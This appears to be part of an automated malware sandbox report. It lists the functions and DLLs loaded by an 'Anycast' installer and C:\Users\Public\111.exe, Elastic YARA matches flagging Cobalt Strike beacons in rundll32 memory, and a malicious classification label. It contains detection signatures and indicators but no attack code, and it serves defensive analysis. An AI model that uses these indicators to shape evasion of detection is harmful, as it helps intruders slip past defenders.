        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0CD09C9F43_2_0CD09C9F
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_017A699043_2_017A6990
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06DA62E843_2_06DA62E8
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06DA7EA143_2_06DA7EA1
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06DABF9843_2_06DABF98
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06E2C4C843_2_06E2C4C8
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06E2B08043_2_06E2B080
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06E268A843_2_06E268A8
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_06E255C043_2_06E255C0
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_072165F443_2_072165F4
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0721A04143_2_0721A041
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_072122C843_2_072122C8
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_072122D843_2_072122D8
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0721103043_2_07211030
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_07216FAF43_2_07216FAF
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0722654843_2_07226548
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0722B3C843_2_0722B3C8
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0722E9A843_2_0722E9A8
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0722DA7043_2_0722DA70
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0C3266C843_2_0C3266C8
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0C32D48D43_2_0C32D48D
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0C32D57843_2_0C32D578
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0C3266C243_2_0C3266C2
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0C32B09043_2_0C32B090
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0CCC3C2F43_2_0CCC3C2F
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0CCC556843_2_0CCC5568
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0CCCEA9843_2_0CCCEA98
        Source: C:\Program Files (x86)\Anycast\Anycast.exeCode function: 43_2_0CD05D8943_2_0CD05D89
        Source: wintun.dll.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) Aarch64, for MS Windows
        Source: wintun.dll.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (native) Aarch64, for MS Windows
        Source: wintun.dll.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (native) x86-64, for MS Windows
        Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\Public\111.exeSection loaded: uxtheme.dll
        Source: C:\Users\Public\111.exeSection loaded: userenv.dll
        Source: C:\Users\Public\111.exeSection loaded: apphelp.dll
        Source: C:\Users\Public\111.exeSection loaded: propsys.dll
        Source: C:\Users\Public\111.exeSection loaded: dwmapi.dll
        Source: C:\Users\Public\111.exeSection loaded: cryptbase.dll
        Source: C:\Users\Public\111.exeSection loaded: oleacc.dll
        Source: C:\Users\Public\111.exeSection loaded: ntmarta.dll
        Source: C:\Users\Public\111.exeSection loaded: version.dll
        Source: C:\Users\Public\111.exeSection loaded: shfolder.dll
        Source: C:\Users\Public\111.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\Public\111.exeSection loaded: windows.storage.dll
        Source: C:\Users\Public\111.exeSection loaded: wldp.dll
        Source: C:\Users\Public\111.exeSection loaded: riched20.dll
        Source: C:\Users\Public\111.exeSection loaded: usp10.dll
        Source: C:\Users\Public\111.exeSection loaded: msls31.dll
        Source: C:\Users\Public\111.exeSection loaded: textinputframework.dll
        Source: C:\Users\Public\111.exeSection loaded: coreuicomponents.dll
        Source: C:\Users\Public\111.exeSection loaded: coremessaging.dll
        Source: C:\Users\Public\111.exeSection loaded: coremessaging.dll
        Source: C:\Users\Public\111.exeSection loaded: wintypes.dll
        Source: C:\Users\Public\111.exeSection loaded: wintypes.dll
        Source: C:\Users\Public\111.exeSection loaded: wintypes.dll
        Source: C:\Users\Public\111.exeSection loaded: textshaping.dll
        Source: C:\Users\Public\111.exeSection loaded: profapi.dll
        Source: C:\Users\Public\111.exeSection loaded: linkinfo.dll
        Source: C:\Users\Public\111.exeSection loaded: ntshrui.dll
        Source: C:\Users\Public\111.exeSection loaded: sspicli.dll
        Source: C:\Users\Public\111.exeSection loaded: srvcli.dll
        Source: C:\Users\Public\111.exeSection loaded: cscapi.dll
        Source: C:\Users\Public\111.exeSection loaded: edputil.dll
        Source: C:\Users\Public\111.exeSection loaded: urlmon.dll
        Source: C:\Users\Public\111.exeSection loaded: iertutil.dll
        Source: C:\Users\Public\111.exeSection loaded: netutils.dll
        Source: C:\Users\Public\111.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Users\Public\111.exeSection loaded: appresolver.dll
        Source: C:\Users\Public\111.exeSection loaded: bcp47langs.dll
        Source: C:\Users\Public\111.exeSection loaded: slc.dll
        Source: C:\Users\Public\111.exeSection loaded: sppc.dll
        Source: C:\Users\Public\111.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Users\Public\111.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: apphelp.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: packet.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: wininet.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: version.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: vcruntime140.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: cryptbase.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: packet.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: wininet.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: vcruntime140.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: version.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: cryptbase.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: packet.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: wininet.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: vcruntime140.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: version.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: cryptbase.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: packet.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: wininet.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: vcruntime140.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: version.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: cryptbase.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: mswsock.dll
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: apphelp.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: cryptbase.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: winmm.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: powrprof.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: umpdc.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: cryptbase.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: winmm.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: powrprof.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: umpdc.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: cryptbase.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: winmm.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: powrprof.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: umpdc.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: mswsock.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: msasn1.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: cryptsp.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: rsaenh.dll
        Source: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exeSection loaded: gpapi.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: mscoree.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: version.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: uxtheme.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: cryptsp.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: rsaenh.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: cryptbase.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: dwrite.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: msvcp140_clr0400.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: windows.storage.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: wldp.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: profapi.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: iphlpapi.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: dnsapi.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: dhcpcsvc.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: winnsi.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: urlmon.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: iertutil.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: srvcli.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: netutils.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: sspicli.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: propsys.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: msasn1.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: riched20.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: usp10.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: msls31.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: gpapi.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: cryptnet.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: ntmarta.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: windowscodecs.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: dwmapi.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: d3d9.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: d3d10warp.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: rasapi32.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: rasman.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: rtutils.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: mswsock.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: winhttp.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: rasadhlp.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: fwpuclnt.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: wtsapi32.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: winsta.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: powrprof.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: umpdc.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: dataexchange.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: d3d11.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: dcomp.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: dxgi.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: twinapi.appcore.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: dxcore.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: textshaping.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: textinputframework.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: coreuicomponents.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: coremessaging.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: coremessaging.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: wintypes.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: wintypes.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: wintypes.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: msctfui.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: uiautomationcore.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: winmm.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: d3dcompiler_47.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: secur32.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: schannel.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: mskeyprotect.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: ntasn1.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: ncrypt.dll
        Source: C:\Program Files (x86)\Anycast\Anycast.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
        Source: 00000004.00000002.4451308422.000002044E250000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
        Source: 00000009.00000002.4450635070.000001B79C0CB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: 00000004.00000002.4448708010.000002044C399000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
        Source: 00000009.00000002.4450512387.000001B79C0A0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
        Source: 00000003.00000002.4450751071.000001FF19CF0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
        Source: 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: 00000003.00000002.4448461751.000001FF17E24000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
        Source: 00000004.00000002.4451432198.000002044E27B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: 00000009.00000002.4448642407.000001B79A210000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
        Source: Process Memory Space: rundll32.exe PID: 3436, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: Process Memory Space: rundll32.exe PID: 4688, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: Process Memory Space: rundll32.exe PID: 2460, type: MEMORYSTRMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
        Source: Hardcodet.NotifyIcon.Wpf.dll.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: Hardcodet.NotifyIcon.Wpf.dll.6.dr, TaskbarIcon.csTask registration methods: 'CreateCustomToolTip', 'OnTaskbarCreated', 'CreateTaskbarIcon', 'CreatePopup'
        Source: QRCoder.dll.6.dr, PayloadGenerator.csSuspicious method names: .PayloadGenerator.IsValidBic
        Source: QRCoder.dll.6.dr, PayloadGenerator.csSuspicious method names: .PayloadGenerator.IsValidIban
        Source: QRCoder.dll.6.dr, PayloadGenerator.csSuspicious method names: .PayloadGenerator.ConvertStringToEncoding
        Source: QRCoder.dll.6.dr, PayloadGenerator.csSuspicious method names: .Payload.ToString
        Source: QRCoder.dll.6.dr, PayloadGenerator.csSuspicious method names: .PayloadGenerator.IsValidQRIban
        Source: QRCoder.dll.6.dr, PayloadGenerator.csSuspicious method names: .PayloadGenerator.EscapeInput
        Source: QRCoder.dll.6.dr, PayloadGenerator.csSuspicious method names: .PayloadGenerator.ChecksumMod10
        Source: QRCoder.dll.6.dr, PayloadGenerator.csSuspicious method names: .PayloadGenerator.isHexStyle
        Source: Packet.dll.6.drBinary string: \Device\NPCAP\WIFI_
        Source: Packet.dll.6.drBinary string: \Device\NPCAP\%s%s\Device\NPCAP\LoopbackAdapter for loopback traffic captureUnknown exceptionbad array new lengthstring too longmap/set too long.exeNpcapHelper%s %drunas\\.\pipe\%s%p,%luSYSTEM\CurrentControlSet\Services\NPCAP\ParametersLoopbackSupportLoopbackAdapterAdminOnlynpcap-%dNPFNPCAP\Device\NPCAP\WIFI_drivers\NPCAP.sysairpcap.dllAirpcapGetLastErrorAirpcapGetDeviceListAirpcapFreeDeviceListAirpcapOpenAirpcapCloseAirpcapGetLinkTypeAirpcapSetKernelBufferAirpcapSetFilterAirpcapGetMacAddressAirpcapSetMinToCopyAirpcapGetReadEventAirpcapReadAirpcapGetStatsAirpcapWrite\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileVersionSYSTEM\CurrentControlSet\Services\NPCAP\\.\Global\%s%wsWIFI_NPF_Loopback
        Source: Packet.dll.6.drBinary string: \Device\NPCAP\Loopback
        Source: Packet.dll.6.drBinary string: \Device\NPCAP\
        Source: classification engineClassification label: mal100.bank.troj.adwa.evad.winDLL@100/73@47/100
